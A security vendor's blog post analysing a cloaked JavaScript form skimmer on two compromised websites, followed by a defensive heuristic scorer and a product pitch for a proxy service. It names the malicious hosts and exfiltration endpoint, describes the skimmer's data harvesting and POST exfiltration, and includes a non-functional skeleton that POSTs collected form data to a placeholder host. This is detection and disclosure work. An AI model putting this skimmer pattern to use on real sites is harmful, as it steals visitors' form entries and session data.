
New client-side attack only a proxy could stop

Saturday, December 21st, 2024


Himanshu Anand

In addition to our proxy-based security service, we’re constantly crawling the web to uncover malicious scripts hiding on websites. This weekend, we flagged some suspicious activity on a couple of compromised sites.

Our investigation found that fasilajouer[.]com and copie-express[.]eu were serving malicious JavaScript through the following URLs:

  • https://wt9478748.ought858.network/9ee7be/stat[.]php
  • https://mf80930039.ought858.network/d385b7/stat[.]php

Initially the scripts seemed harmless, delivering nothing more than a simple jQuery.noConflict() command during static analysis. But what we saw live on the infected sites told a very different story.

The full malicious payload can be reviewed here.

This script is a pretty advanced master of disguise. When fetched in isolation, it serves up a harmless jQuery.noConflict() script. But on compromised websites, it transforms into an obfuscated, data-stealing one, designed to slip past standard security tools.

Analysis of the malicious JavaScript

In detail

  • Data collection:
    • <input> fields: captures field names/IDs and user-entered values.
    • <select> elements: records the selected options.
    • <textarea> fields: extracts the text content.
    • The collected data is encoded with btoa and stored in kCNQz6sIkvX.
  • Cookie utilization:
    • The function ccaj3Q8zYOk(name) reads and updates cookies such as PHP_SID to track session data and avoid duplicate transmissions.
  • Data transmission:
    • The harvested data is sent to a remote server via an XMLHttpRequest POST request to:
      https://gj51015259.ought858.network/75d240/track[.]php
  • Event triggering:
    • A click listener (document.addEventListener('click')) runs the data collection function (Eros2SjseYx) on every user interaction.
    • The DOMContentLoaded event ensures the script executes when the page loads.
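The behaviours listed above are the signals a defender can key on once the script body that is actually delivered to the browser is in hand. The following is an added example, not c/side's code: a small heuristic scorer that flags the combination of form-field harvesting, btoa encoding, cookie access, an XMLHttpRequest POST and a document-level click listener, and that extracts the POST target so its origin can be compared with the page's. The indicator weights, the threshold, the regexes and both sample script bodies (including the example.invalid host and the shop.example page origin) are constructed for this example; the "skimmer-like" sample is only a skeleton with the same API surface as the payload described above.

```javascript
// Added example (not c/side's code): heuristic scoring of a delivered script body.
// Weights, threshold and regexes are assumptions chosen for illustration.
const INDICATORS = [
  { name: "form-field harvesting", weight: 2,
    re: /querySelectorAll\s*\(\s*['"][^'"]*(input|select|textarea)/i },
  { name: "base64 encoding of collected data", weight: 1, re: /\bbtoa\s*\(/ },
  { name: "cookie read/write", weight: 1, re: /document\.cookie/ },
  { name: "XMLHttpRequest POST", weight: 2,
    re: /XMLHttpRequest[\s\S]{0,200}?\.open\s*\(\s*['"]POST['"]/i },
  { name: "click listener on document", weight: 1,
    re: /document\.addEventListener\s*\(\s*['"]click['"]/ },
  { name: "DOMContentLoaded hook", weight: 1, re: /DOMContentLoaded/ },
];

// Returns the matched indicator names, a weighted score and a verdict.
function scoreScript(body, threshold = 5) {
  const matched = INDICATORS.filter((i) => i.re.test(body));
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  return { score, matched: matched.map((i) => i.name), suspicious: score >= threshold };
}

// Collects absolute URLs passed to xhr.open('POST', ...) and marks those whose
// origin differs from the page origin (exfiltration normally goes to a third party).
function postTargets(body, pageOrigin) {
  const out = [];
  const re = /\.open\s*\(\s*['"]POST['"]\s*,\s*['"]([^'"]+)['"]/gi;
  let m;
  while ((m = re.exec(body)) !== null) {
    try {
      const u = new URL(m[1], pageOrigin);
      out.push({ url: u.href, thirdParty: u.origin !== pageOrigin });
    } catch {
      // malformed URL: nothing to resolve, skip it
    }
  }
  return out;
}

// Constructed samples. The first is what a scanner fetching the URL in isolation
// would see; the second is a non-functional skeleton that merely uses the same
// browser APIs as the payload described in the post.
const BENIGN_VARIANT = "jQuery.noConflict();";
const SKIMMER_LIKE_VARIANT = `
document.addEventListener('DOMContentLoaded', function () {
  document.addEventListener('click', function () {
    var fields = document.querySelectorAll('input, select, textarea');
    var blob = btoa(/* field names and values would be serialised here */ '');
    if (document.cookie.indexOf('PHP_SID') === -1) { /* mark as already sent */ }
    var x = new XMLHttpRequest();
    x.open('POST', 'https://example.invalid/track.php');
    x.send(blob);
  });
});`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(scoreScript(BENIGN_VARIANT));          // score 0, not suspicious
  console.log(scoreScript(SKIMMER_LIKE_VARIANT));    // score 8, suspicious
  console.log(postTargets(SKIMMER_LIKE_VARIANT, "https://shop.example"));
}
```

Run it with Node. The benign variant matches nothing, which is exactly why a crawler-side check is not enough on its own: the scorer only produces a useful verdict when it is run over the body a real visitor's browser received.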

How only a proxy solves this

The important takeaway is that the script's behavior changes depending on how it is fetched. Requested in isolation, it looks completely innocent: a bare jQuery.noConflict() call. Delivered on an infected website, it is a different story: an obfuscated payload built to exfiltrate user data.

Traditional scanners, crawlers, or static analysis tools would more than likely only ever see the benign version, overlooking the malicious behavior entirely.

This is where c/side shines. By routing every request through our proxy, we analyze scripts in real time, on the exact bytes a visitor's browser is about to receive. Only scripts that pass our tests are sent to the user's browser, with no or minimal latency.

This lets us detect dynamic, event-driven behaviors such as the ones in this live example. Tools that do not monitor the full lifecycle of a script's interactions are likely to miss these signs.

The devil's in the details. And c/side is built to catch them.

Additionally, we archive every version of the script for further analysis in our dashboard, giving you full visibility. Our deobfuscation and AI analysis highlight exactly what changed between versions.

Competitors who don't use a proxy are likely to miss these types of attacks.


More About Himanshu Anand

I'm a software engineer and security analyst at c/side.